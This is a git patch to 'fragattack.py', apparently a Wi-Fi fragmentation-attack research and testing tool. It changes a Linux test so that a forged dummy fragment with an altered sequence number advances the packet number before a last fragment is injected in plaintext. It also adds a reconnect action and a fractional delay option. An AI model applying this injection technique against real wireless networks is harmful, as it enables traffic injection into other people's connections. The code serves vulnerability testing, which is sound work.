From 4ef5b08880c8b1a63eb4851536e29b1a9146e3da Mon Sep 17 00:00:00 2001
From: Mathy <mathy.vanhoef@nyu.edu>
Date: Thu, 23 Apr 2020 15:43:47 -0400
Subject: [PATCH] fragattacks: avoid false positives in linux plaintext test

---
 research/fragattack.py | 14 ++++++++------
 1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/research/fragattack.py b/research/fragattack.py
index 5202a1b39..76e568429 100755
--- a/research/fragattack.py
+++ b/research/fragattack.py
@@ -300,11 +300,11 @@ class LinuxTest(Test):
 		# Fragment 1: normal
 		self.actions[0].frame = frag1
 
-		# Fragment 2: make Linux update latest used crypto Packet Number.
-		# We only change the sequence number since that is not authenticated.
-		frag2enc = frag2.copy()
-		frag2enc.SC ^= (1 << 4)
-		self.actions[1].frame = frag2enc
+		# Fragment 2: make Linux update latest used crypto Packet Number. Use a dummy packet
+		# that can't accidently aggregate with the first fragment in a corrrect packet.
+		p = station.get_header()/LLC()/SNAP()/IP()
+		p.SC = frag2.SC ^ (1 << 4)
+		self.actions[1].frame = p
 
 		# Fragment 3: can now inject last fragment as plaintext
 		self.actions[2].frame = frag2
@@ -1159,6 +1159,8 @@ def stract2action(stract):
 		return Action(trigger, action=Action.GetIp)
 	elif c == 'R':
 		return Action(trigger, action=Action.Rekey)
+	elif c == 'C':
+		return Action(trigger, action=Action.Reconnect)
 	elif c == 'P':
 		return Action(trigger, enc=False)
 	elif c == 'E':
@@ -1294,7 +1296,7 @@ if __name__ == "__main__":
 	parser.add_argument('--peerip', help="IP of the device we will test.")
 	parser.add_argument('--ap', default=False, action='store_true', help="Act as an AP to test clients.")
 	parser.add_argument('--debug', type=int, default=0, help="Debug output level.")
-	parser.add_argument('--delay', type=int, default=0, help="Delay between fragments in certain tests.")
+	parser.add_argument('--delay', type=float, default=0, help="Delay between fragments in certain tests.")
 	parser.add_argument('--inc_pn', type=int, default=1, help="To test non-sequential packet number in fragments.")
 	parser.add_argument('--msdu', default=False, action='store_true', help="Encapsulate pings in an A-MSDU frame.")
 	parser.add_argument('--arp', default=False, action='store_true', help="Override default request with ARP request.")